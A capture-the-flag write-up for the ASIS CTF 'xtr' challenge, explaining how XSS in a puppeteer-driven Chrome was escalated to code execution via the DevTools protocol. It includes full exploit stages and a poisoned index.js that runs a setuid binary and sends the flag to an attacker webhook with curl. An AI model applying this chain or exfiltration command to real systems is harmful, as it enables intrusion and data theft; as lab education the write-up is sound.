ASIS CTF - xtr

Writeup by: andyandpandy, Anakin

Solved by: Fr3d, c3lphie, Anakin, andyandpandy, patriksletmo, ly4k and more


This challenge took us 21 hours to solve. Only 3 out of 524 teams solved it.


The challenge presented a scenario where we had arbitrary JavaScript execution on a website. From there we were able to reach the Chrome DevTools Protocol (CDP) by opening DevTools inside of DevTools, importing the DevTools frontend module, and executing commands that change Chrome's behavior. Specifically, we changed where Chrome stores downloaded files on the host, which let us overwrite a file that was being executed in a bash loop. The next iteration of the loop then ran our malicious code on the server, giving us remote code execution and allowing us to exfiltrate the flag.

Challenge Description

wow i have xss on all pages. i wonder what is stopping me from getting rce…


In this demo, headless mode has been set to false, and the Docker container is run with extra privileges, so that the actions performed by the final script can be observed.



FROM ubuntu:latest

RUN apt-get update
RUN apt-get upgrade -y
RUN apt-get install -y curl
RUN curl -fsSL | bash -
RUN apt-get install -y ca-certificates fonts-liberation libappindicator3-1 libasound2 libatk-bridge2.0-0 libatk1.0-0 libc6 libcairo2 libcups2 libdbus-1-3 libexpat1 libfontconfig1 libgbm1 libgcc1 libglib2.0-0 libgtk-3-0 libnspr4 libnss3 libpango-1.0-0 libpangocairo-1.0-0 libstdc++6 libx11-6 libx11-xcb1 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxext6 libxfixes3 libxi6 libxrandr2 libxrender1 libxss1 libxtst6 lsb-release xdg-utils wget nodejs

RUN wget -q
RUN dpkg -i ./google-chrome-stable_current_amd64.deb
RUN rm ./google-chrome-stable_current_amd64.deb

COPY ./stuff /app
COPY ./stuff/chmodflag /
COPY ./flag.txt /flag.txt
RUN chmod 000 /flag.txt
RUN chmod +x /app/ /app/index.js /chmodflag
RUN chmod u+s /chmodflag
RUN useradd -m www
RUN chown www /app -R
USER www

#!/usr/bin/env python3
# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:"./"
import os
import re
import json
import time
import subprocess

if not os.path.exists('/tmp/ips.json'):
	f = open('/tmp/ips.json','w')
	f.write('{}')
	f.close()

ipFile = open('/tmp/ips.json','r+')
peerIp = os.environ['SOCAT_PEERADDR']
ips = {}

ips = json.loads(ipFile.read())
if(peerIp in ips):
	if(time.time() > ips[peerIp]):
		ips[peerIp] = int(time.time())+30
	else:
		print('one try each 30 seconds')
		exit()
else:
	ips[peerIp] = int(time.time())+30

ipFile.seek(0)
ipFile.write(json.dumps(ips))
ipFile.truncate()

s = input('input: ')
assert(
	re.match('^[A-Za-z0-9=+/ ]+$',s) and
	s.count(' ') < 4 and
	len(s) < 3000
)
subprocess.run(('docker run --rm xtr /app/ '+s).split(' '))

#!/bin/bash
for var in "$@"
do
    ./index.js "$var"
done

#!/usr/bin/env node
const puppeteer = require('puppeteer');

(async () => {
	const opts = JSON.parse(atob(process.argv[2]))

	let browser
	try {
		browser = await puppeteer.launch({
			headless: 'chrome',
			pipe: true,
			args: [],
			executablePath: "/usr/bin/google-chrome",
		});

		console.log('[+] Browser online')

		let page = await browser.newPage();
		await page.goto(opts.url.toString(), { timeout: 3000, waitUntil: 'domcontentloaded' });

		let ackCnt = Math.min(10,+opts.actions.length)
		for(let i=0;i<ackCnt;i++){
			let pages = await browser.pages()
			let idx = opts.actions[i].pageIdx
			let payload = opts.actions[i].payload.toString()

			await pages[idx].evaluate((s)=>eval(s),payload)
			await new Promise((r)=>setTimeout(r,300));
			console.log(`[+] Executed payload ${i}`)
		}

		await page.close();
		await browser.close();
		browser = null;
	} catch(err){
	} finally {
		if (browser) await browser.close();
		console.log(`[+] Browser closed`)
	}
})()

#include <sys/stat.h>
#include <stdio.h>

int main(){
	// make the flag readable again (it was chmod 000 in the Dockerfile)
	chmod("/flag.txt", 0444);
	return 0;
}

The first thing to notice in the Dockerfile is that the flag has had its permissions set to 000, meaning we cannot just read it directly. If that were possible, we could simply load the flag via the file protocol, scrape the DOM and send it to an endpoint of our choosing. Instead, we first have to run the chmodflag binary, compiled from the code in chmodflag.c and installed with the setuid bit (chmod u+s); after running it, the flag becomes readable. Furthermore, the user www owns /app recursively. As the /app directory itself has not had its permissions changed, we can read and write in this folder as www.

The entry point for our input is the script exposed by socat on a predefined port. The first part of the code prevents DoS attacks against the server by restricting each IP to one try every 30 seconds. Past that, an assert statement checks that the payload matches a regex pattern, restricting it to characters found in the base64 charset (plus spaces). It also checks that the payload contains at most 3 spaces and is less than 3000 characters long. Hence, the limitations on our payload are: at most 2999 characters, at most 3 spaces, and only characters from the base64 charset.
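These restrictions can be captured in a small Python predicate (our own re-implementation of the filter for illustration; the function name is ours, not the challenge's):

```python
import re

def payload_allowed(s: str) -> bool:
    """Mirror of the server's assert: only base64-charset characters
    (plus spaces), fewer than 4 spaces, fewer than 3000 characters."""
    return bool(
        re.match(r'^[A-Za-z0-9=+/ ]+$', s)
        and s.count(' ') < 4
        and len(s) < 3000
    )

print(payload_allowed('aGVsbG8='))          # True: one base64 token
print(payload_allowed('a b c d e'))         # False: four spaces
print(payload_allowed('A' * 3000))          # False: too long
print(payload_allowed('$(cat /flag.txt)'))  # False: characters outside the charset
```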

If we get past this assertion, the script runs a Docker container with our payload appended to the command. Inside the container, a bash script splits the payload at the spaces and loops over each item, running index.js with each separate base64-encoded payload. It is noteworthy that index.js is not explicitly invoked with node in the bash script, but instead as an executable whose shebang line points to wherever node is found in PATH.
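This shebang detail is what makes the later overwrite attack possible: the kernel chooses the interpreter from the file's first line, not from its extension. A minimal standalone demonstration of this behaviour (a toy example of ours, not part of the challenge files):

```python
import os
import stat
import subprocess
import tempfile

with tempfile.TemporaryDirectory() as d:
    # A file named like a Node script, but whose shebang points at the shell.
    path = os.path.join(d, 'index.js')
    with open(path, 'w') as f:
        f.write('#!/bin/sh\necho pwned\n')
    # Mark it executable, as index.js is in the challenge image.
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    # The kernel reads '#!/bin/sh' and runs the file as a shell script,
    # despite the .js extension.
    out = subprocess.run([path], capture_output=True, text=True)

print(out.stdout.strip())
```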

Gaining CSRF/XSS

The index.js file decodes and parses the payload as a JSON object, and launches the latest version of Google Chrome with puppeteer. It then visits the provided URL and evaluates any JavaScript actions we supply in the JSON object. This means we have arbitrary XSS on any domain. The goal is now to get RCE, run the chmodflag binary, and extract the flag.

How do we get RCE when we are stuck in browser context?
Since we are able to run several payloads, we can use the first iteration to download a malicious file that overwrites index.js, which will then be run on the second iteration, giving us RCE.

The first objective is therefore to control where downloaded files are stored. Preliminary tests show that downloaded files are stored in /home/www/Downloads by default. This is unfortunate, as we need them to land in /app in order to overwrite files used by the application.

Chrome DevTools Protocol (CDP) to the rescue

The Chrome DevTools Protocol (CDP) is an API that allows instrumentation of different functionalities and components of Chrome/Chromium-based browsers. This is interesting for us because puppeteer drives headless Chrome over CDP: all communication and actions between puppeteer and Chrome happen through this protocol.

You can find more information regarding CDP in the official documentation.

Why is this relevant for us?
Because we can take advantage of CDP to change where Chrome stores downloaded files.

Normally when using puppeteer, CDP is exposed for debugging purposes on a random local port, which we can interact with. Writeups exist that use this to get hold of CDP: they first either know or brute-force the port CDP is exposed on, and then abuse it to do black magic. In this case, though, puppeteer is launched with the pipe: true flag, which only allows external interaction with CDP through a local pipe to the Chrome process, eliminating the network-port approach. However, there are still ways to interact with CDP.

To quote directly from the page:

Alternatively, you can execute commands from the DevTools console. First, open devtools-on-devtools, then within the inner DevTools window, use Main.MainImpl.sendOverProtocol() in the console:

let Main = await import('./devtools-frontend/front_end/entrypoints/main/main.js'); // or './entrypoints/main/main.js' or './main/main.js' depending on the browser version
await Main.MainImpl.sendOverProtocol('Emulation.setDeviceMetricsOverride', {
  mobile: true,
  width: 412,
  height: 732,
  deviceScaleFactor: 2.625,
});

const data = await Main.MainImpl.sendOverProtocol("Page.captureScreenshot");

Note that this method is basically reaching into internals of the DevTools source code and there is no guarantee that it’d continue to work as DevTools evolves.

Our goal is now to open DevTools, then open DevTools inside that DevTools window, and import the main.js module above, so that we can interact with CDP and change Chrome's behavior accordingly. Specifically, we want to change where downloaded files are stored on the host, which we can do through Page.setDownloadBehavior.
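For context, each CDP command is just a JSON message carrying an id, a method name, and its parameters; what sendOverProtocol will end up issuing for our purposes looks roughly like this (a sketch of the message shape only, in Python for illustration; the actual pipe framing differs):

```python
import json

# Hypothetical wire-level view of the command we want to issue.
cmd = {
    "id": 1,
    "method": "Page.setDownloadBehavior",
    "params": {"behavior": "allow", "downloadPath": "/app"},
}

wire = json.dumps(cmd)
print(wire)
```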

Manually obtaining access to CDP

How do we easily open DevTools in Chrome, without obvious ways of using e.g. a keyboard to press F12 or similar?
We can use the built-in chrome://inspect/#pages page, which lets us click inspect links for various pages. When running our exploit, we ended up having DevTools in DevTools in DevTools, which meant we had to smuggle some of the commands through an additional Runtime.evaluate.

The below code shows how we constructed our base64 encoded payload:

import subprocess
from base64 import b64encode
import json

stage1 = open("stage1.js").read()
stage2 = open("stage2.js").read()

actions = [
    {
        'pageIdx': "1",
        'payload': stage1
    },
    {
        'pageIdx': "2",
        'payload': stage2
    }
]

k = {
    'url': 'chrome://inspect/#pages',
    'actions': actions
}

s = b64encode(json.dumps(k).encode()).decode()
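A convenient property of this encoding is that base64 output only ever uses characters from the filter's allowed set and contains no spaces, so only the 3000-character limit can reject the exploit. A standalone sanity check (the stage payloads below are placeholders, not the real stages):

```python
import json
import re
from base64 import b64encode

# Placeholder stand-ins for the real stage1.js / stage2.js contents.
actions = [
    {'pageIdx': "1", 'payload': "console.log('stage1')"},
    {'pageIdx': "2", 'payload': "console.log('stage2')"},
]
k = {'url': 'chrome://inspect/#pages', 'actions': actions}
s = b64encode(json.dumps(k).encode()).decode()

print(bool(re.match(r'^[A-Za-z0-9=+/ ]+$', s)))  # True: base64 charset only
print(s.count(' '))                              # 0: no spaces at all
print(len(s) < 3000)                             # True: well under the limit
```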

function sleep(ms) {
    return new Promise(resolve => setTimeout(resolve, ms));
}

(async () => {
    await sleep(1000);
    await sleep(1000);
    await sleep(1000);
})()

function sleep(ms) {
    return new Promise(resolve => setTimeout(resolve, ms));
}

(async () => {
    const payload = `
    function sleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
    }

    (async () => {
    let Main = await import('./devtools-frontend/front_end/entrypoints/main/main.js');
    await sleep(1000);

    console.log("Setting download behavior");

    Main.MainImpl.sendOverProtocol("Page.setDownloadBehavior", {
        "behavior": "allow",
        "downloadPath": '/app'
    });

    await sleep(1000);
    console.log("Opening chrome://download-internals");
    Main.MainImpl.sendOverProtocol("Page.navigate", {url: "chrome://download-internals"});

    await sleep(1000);
    console.log("Starting download");
    await Main.MainImpl.sendOverProtocol("Runtime.evaluate", {expression: "var x = document.getElementById('download-url');x.value = '<url>/index.js';var y = document.getElementById('start-download');y.click();"});

    await sleep(3000);
    })()
    `;

    await sleep(3000);
    var Main = await import('./devtools-frontend/front_end/entrypoints/main/main.js');
    await sleep(2000);
    await Main.MainImpl.sendOverProtocol("Runtime.evaluate", {expression: payload})
    await sleep(3000);
})()

#!/bin/bash
/chmodflag
curl <webhook>/?flag=$(cat /flag.txt | base64)

Executing the exploit

First and foremost, we have puppeteer open the URL chrome://inspect/#pages. Then stage1 is executed: we click on the inspect span.action link, click on the other tab in the navigation menu, and then inspect the DevTools window itself. This gives us DevTools in DevTools, inside DevTools.

Stage2 runs asynchronously, allowing us to call sleep and use sendOverProtocol to communicate with CDP. It imports main.js of the Chrome DevTools frontend, giving us access to the method Main.MainImpl.sendOverProtocol and thereby an entry point into CDP.

Main.MainImpl.sendOverProtocol("Page.setDownloadBehavior", {
    "behavior": "allow",
    "downloadPath": '/app'
});

Calling Page.setDownloadBehavior sets the download path for the currently running Chrome, which will now allow all download requests and place the files inside of /app.

Afterwards we navigate to chrome://download-internals, set the URL-to-download field to the location of our poisoned index.js file, and click the "Download" button to initiate the download, thereby overwriting index.js. On the next payload iteration the poisoned index.js is run as a bash script, executing the chmodflag binary and exfiltrating the flag to an endpoint we control. Throughout the script we use a handful of sleeps to ensure every step has enough time to complete.

Finally, running the exploit gets us the flag:

Flag: ASIS{node+chrome+xss-lmao}